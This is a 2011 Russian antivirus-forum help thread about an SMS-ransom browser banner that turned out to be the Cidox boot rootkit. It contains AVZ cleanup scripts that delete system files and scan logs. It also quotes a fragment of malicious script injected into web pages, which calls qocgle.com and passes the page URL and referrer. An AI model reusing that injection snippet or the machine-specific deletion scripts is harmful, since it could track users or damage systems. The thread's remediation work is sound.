Показано с 1 по 9 из 9.

Браузеры заблокированы баннером с смс на 3381 (заявка № 104305)

  1. #1
    Junior Member Репутация
    Регистрация
    23.06.2011
    Сообщений
    13
    Вес репутации
    24

    Thumbs up Браузеры заблокированы баннером с смс на 3381

    Добрый день
    Помогите пожалуйста с проблемой. Бьюсь уже три дня

    Все началось с левого апдейта Файрфокса.
    После этого комп начал тупить и через некоторое время ФФ выдал, что в системе троян и надо поставить апдейт, причем платный.
    А через неск.минут выдал во весь экран баннер с СМС на 3381
    В ИЕ аналогично.

    CureIt нашел только модифицированный hosts с подменой адресов.

    Результат AVZ
    http://exfile.ru/186625

    результат HiJack здесь
    http://exfile.ru/186631

    Далее я выполнил скрипт в AVZ

    begin
    SearchRootkit(true, true);
    SetAVZGuardStatus(True);
    QuarantineFile('C:\WINDOWS\system32\pxxshpi.dll',' ');
    DeleteFile('C:\WINDOWS\system32\pxxshpi.dll');
    BC_ImportALL;
    ExecuteSysClean;
    ExecuteWizard('SCU', 2, 2, true);
    BC_Activate;
    RebootWindows(true);
    end.
    после перезагруза прогнал AVZ - вроде чисто. ушел в ребут и потребовал проверить диск физически по полной. нашел кучу потерянных кластеров. вылечился.
    возможно, что винда пыталась восстановить потертые при зачистке кеши браузеров и т.д.

    Все сделал, Почистил. Осталась проблема: при заходе на некоторые сайты ловлю баннер.
    Поставил фильтр на скрипты страниц.
    Обнаружил, что у меня браузер приклеивает к низу страницы дополнительный кусок с обращением на сайт qocle.com

    И осталось, что некоторые страницы упрямо в коде остаются. Общее подтормаживание подсказывает, что сидит зараза где-то.

    AVZ лог тут http://exfile.ru/186745
    HiJack тут http://exfile.ru/186742

    затем пофиксил в HiJack
    F2 - REG:system.ini: UserInit=\\.\globalroot\systemroot\system32\userin it.exe,
    20 - Winlogon Notify: DeviceNP - DeviceNP.dll (file missing)
    Выполнил скрипт в AVZ:
    Код:
    begin
    SearchRootkit(true, true);
    SetAVZGuardStatus(True);
    QuarantineFile('C:\WINDOWS\vsnpstd3.exe','');
    DeleteService('catchme');
    BC_ImportAll;
    ExecuteWizard('TSW',2,2,true);
    BC_Activate;
    RebootWindows(true);
    end.
    Компьютер перезагрузился. Сохранил в архив карантин
    Код:
    begin
    CreateQurantineArchive(GetAVZDirectory+'quarantine .zip');
    end.
    Браузер продолжает показывать иногда код вместо страниц (он режет начало кода, как я заметил, превращая сраницу в мусор)
    Архив карантина здесь: http://exfile.ru/186976

    вчера еще поставил Malwarebyte и прогнал им.

    Вот его лог

    Malwarebytes' Anti-Malware 1.51.0.1200

    www.malwarebytes.org

    Database version: 6919

    Windows 5.1.2600 Service Pack 2
    Internet Explorer 8.0.6001.18702

    22.06.2011 20:57:47
    mbam-log-2011-06-22 (20-57-41).txt

    Scan type: Full scan (C:\|)
    Objects scanned: 336890
    Time elapsed: 1 hour(s), 46 minute(s), 25 second(s)

    Memory Processes Infected: 0
    Memory Modules Infected: 0
    Registry Keys Infected: 3
    Registry Values Infected: 1
    Registry Data Items Infected: 0
    Folders Infected: 1
    Files Infected: 3

    Memory Processes Infected:
    (No malicious items detected)

    Memory Modules Infected:
    (No malicious items detected)

    Registry Keys Infected:
    HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Ext\Stats\{FFFC57DB-1DE3-4303-B24D-CEE6DCDD3D86} (Adware.MyCentria) -> No action taken.
    HKEY_LOCAL_MACHINE\SOFTWARE\MyCentria (Adware.MyCentria) -> No action taken.
    HKEY_LOCAL_MACHINE\SOFTWARE\StimulProfit (Adware.Agent) -> No action taken.

    Registry Values Infected:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\TNOD UP (Trojan.Agent.CK) -> Value: TNOD UP -> No action taken.

    Registry Data Items Infected:
    (No malicious items detected)

    Folders Infected:
    c:\program files\FieryAds (Adware.Adware.FearAds) -> No action taken.

    Files Infected:
    c:\program files\tnod user & password finder\TNODUP.exe (Trojan.Agent.CK) -> No action taken.
    c:\system volume information\_restore{be2448ee-02b9-4dba-a20e-f0836f944ab8}\RP691\A0270406.EXE (Dont.Steal.Our.Software) -> No action taken.
    c:\documents and settings\val_sav\application data\fieryads.dat (Adware.FieryAds) -> No action taken.
    Скрыть



    Все поубивал.
    Зачистил все кеши и настройки браузеров, поставил Оперу и Хрому.
    Они вообще почти не работают, либо выкидывая баннер, либо зависая на пустой странице. Иногда сыпят кодом.

    Переставил старую версию 3.6 ФФ
    вот к примеру сейчас раз 10 пытался написать ответ на форум.
    открывается пустое окно с куском кода типа
    limit: 3,
    title_font_size: 3,
    favicon: true
    });
    });
    t = d.documentElement.firstChild;
    s = d.createElement("script");
    s.type = "text/javascript";
    s.src = "http://an.yandex.ru/system/context.js";
    s.setAttribute("async", "true");
    t.insertBefore(s, t.firstChild);
    })(window, document, "yandex_context_callbacks");
    </script>

    </body>
    </html>
    0


    и все.
    т.е. где-то сидит зараза, которая мне сначала цепляла всякую дрянь в страницы, а теперь она просто не пропускает часть кода в браузер.
    проксей у меня нет

    в эксплорере баннер упрямо появляеся на любой странице
    если глянуть код страницы, то в конце приклеивается кусок
    "://qocgle.com/loPtfdn3dSasoicn/js.php?t=stat&ran="+encodeURIComponent("tS3NkLiAAh zLcpP849yvB4jdTJo9XYeaKfKSfh1U7hNb3qAVby69FVaP8QKf wlyH")+"&r="+escape(document.referrer)+"&u="+escap e(document.URL)+"&v=351&"+Math.random()+"'>"+unesc ape("%3C/script%3E"));}</script></BODY></HTML>

    вот на этом самом qocgle.com как раз и сидит зараза.
    поставил Хрому - она вообще пробиться не может наружу. повезло, что 2 файрфокса стояло в системе. Первый дефауловый погиб.
    Через второй с трудом, но хоть хожу

    Поставил Оперу - та же хрень
    Баннер везде, пока не отключаю ява-скрипты
    После этого через некоторое время начинает тормозить и выдавать куски кода.
    Или вообще ничего.
    Похоже какой-то виртуальный прокси перехватывает все по 80 порту.

    Спецы, кто помогал - говорят, что все чисто. И быть такого не может, но оно же есть.

    Помогите пожалуйста.
    Заранее благодарю.
    Последний раз редактировалось thyrex; 24.06.2011 в 19:56.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,464
    Вес репутации
    343
    Уважаемый(ая) val_sav, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Junior Member Репутация
    Регистрация
    23.06.2011
    Сообщений
    13
    Вес репутации
    24
    Забыл добавить:
    Началось все вечером 20го
    Вот что отловил НОД32 в этот момент

    20.06.2011 21:03:46 HTTP filter archive http://lgene.ru/fm5ruk4llLNoeI1UkFtB...aua?pp=1&x=900 PDF/Exploit.Pidief.PGI trojan connection terminated - quarantined VAL-NOTE\val_sav Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox 4.0 Beta 12\firefox.exe

    На следующий день он увидел
    21.06.2011 0:13:03 Real-time file system protection file C:\Documents and Settings\All Users\Application Data\5176093.bat BAT/DelMe.A.Gen trojan cleaned by deleting - quarantined NT AUTHORITY\SYSTEM Event occurred on a new file created by the application: C:\Documents and Settings\All Users\Application Data\rua.

    А сегодня вечером:

    23.06.2011 21:22:02 Real-time file system protection file C:\System Volume Information\_restore{BE2448EE-02B9-4DBA-A20E-F0836F944AB8}\RP731\A0305315.dll a variant of Win32/Kryptik.PGX trojan cleaned by deleting - quarantined NT AUTHORITY\SYSTEM Event occurred on a file modified by the application: C:\WINDOWS\System32\svchost.exe.

  5. #4
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    23.06.2009
    Адрес
    Пермь
    Сообщений
    11,186
    Вес репутации
    528
    - Сделайте логи по правилам п.1-3 раздела Диагностика.(virusinfo_syscure.zip;virusinfo_syscheck.zip; hijackthis.log)

  6. #5
    Junior Member Репутация
    Регистрация
    23.06.2011
    Сообщений
    13
    Вес репутации
    24
    Сделал все как написано.
    Во время 2го скрипта был запущен ИЕ с баннером.
    Все в приложенных файлах.

  7. #6
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    23.06.2009
    Адрес
    Пермь
    Сообщений
    11,186
    Вес репутации
    528
    Обновите систему
    - SP2 обновите до Service Pack 3(может потребоваться активация)
    * Перед установкой Сервис Пака необходимо выгрузить антивирус, файрвол, а так же резидентные приложения типа TeaTimer (Spybot Search and Destroy) и др.)
    * Microsoft остановил поддержку и выпуск обновлений безопасности для ОС Windows XP без установленного SP3, см.тут
    - Установите Internet-Explorer 8.(даже если Вы его не используете)
    - Поставте все последние обновления системы Windows - тут

    После обновления:
    - Сделайте лог MBAM

  8. #7
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    96,525
    Вес репутации
    3021
    А также

    Загрузитесь с консоли восстановления, выполните команду fixboot c: и перезагрузитесь
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  9. #8
    Junior Member Репутация
    Регистрация
    23.06.2011
    Сообщений
    13
    Вес репутации
    24
    Любой апдейт приводит к баннеру с требованием сис на 3381 за апдейт ИЕ
    МВАМ ничего не видит
    Вчерашний CureIt тоже
    Сюда хожу через айфон. Последнее время пробиться через куски кодов с компа не могу. (звучит прям как экспедиция капитана Татаринова)

    Добавлено через 2 часа 8 минут

    Цитата Сообщение от thyrex Посмотреть сообщение
    А также

    Загрузитесь с консоли восстановления, выполните команду fixboot c: и перезагрузитесь
    не понимаю смысла этой операции в данном случае, а к тому же у меня ХР и bootrec просто нет

    Добавлено через 1 час 31 минуту

    вот такая вот красотень при попытке любого апдейта винды из под ФФ

    ну, а из-под ИЕ глядят девчонки

    Добавлено через 11 часов 41 минуту

    господа вирусологи
    на ночь глядя подумалось мне - а и не лечите эту дрянь
    не надо
    а то у нас полстраны в одноклассниках сидит, а вторая половина в линейках всяких.
    может хоть поработаем....
    Последний раз редактировалось thyrex; 27.06.2011 в 00:59. Причина: Добавлено

  10. #9
    Junior Member Репутация
    Регистрация
    23.06.2011
    Сообщений
    13
    Вес репутации
    24
    После установки Recovery Console и попытки зайти в нее -
    TRAP 00010010========EXCEPTION++++++++++
    и куча состояний регистров на экране
    вообщем не встает Recovery Console

    у меня WinXP EN SP2

    Добавлено через 1 час 0 минут

    а чтоже вы молчите то?

    если все уже решено
    успешное излечение с использованием Kaspersky Virus Removal Tool 2010 (AVPTool) даже без использования безопасного режима!
    Цитата:
    25.06.2011 20:52:35 Задача запущена
    25.06.2011 20:52:44 Обнаружено: Rootkit.Boot.Cidox.a C
    25.06.2011 20:52:54 Вылечено: Rootkit.Boot.Cidox.a C
    25.06.2011 20:52:58 Вылечено: Rootkit.Boot.Cidox.a C
    Обладатели KAV могут спать спокойно.
    Добавлено через 43 минуты

    У меня тоже самое нашлось.
    Уже вылечился.
    Последний раз редактировалось val_sav; 26.06.2011 в 13:38. Причина: Добавлено

  • Уважаемый(ая) val_sav, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Заблокированы браузеры
      От vovanm в разделе Помогите!
      Ответов: 4
      Последнее сообщение: 18.03.2012, 13:41
    2. Заблокированы Браузеры
      От jkeg в разделе Помогите!
      Ответов: 4
      Последнее сообщение: 06.12.2011, 11:50
    3. Не работают браузеры. номер 3381
      От Дмитрий_Ростов в разделе Помогите!
      Ответов: 2
      Последнее сообщение: 16.09.2011, 07:27
    4. Браузеры заблокированы баннером
      От neophyte в разделе Помогите!
      Ответов: 5
      Последнее сообщение: 25.06.2011, 18:43
    5. Интернет браузеры заблокированы
      От Сане"уг"к в разделе Помогите!
      Ответов: 9
      Последнее сообщение: 03.09.2010, 18:23

    Метки для этой темы

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01279 seconds with 16 queries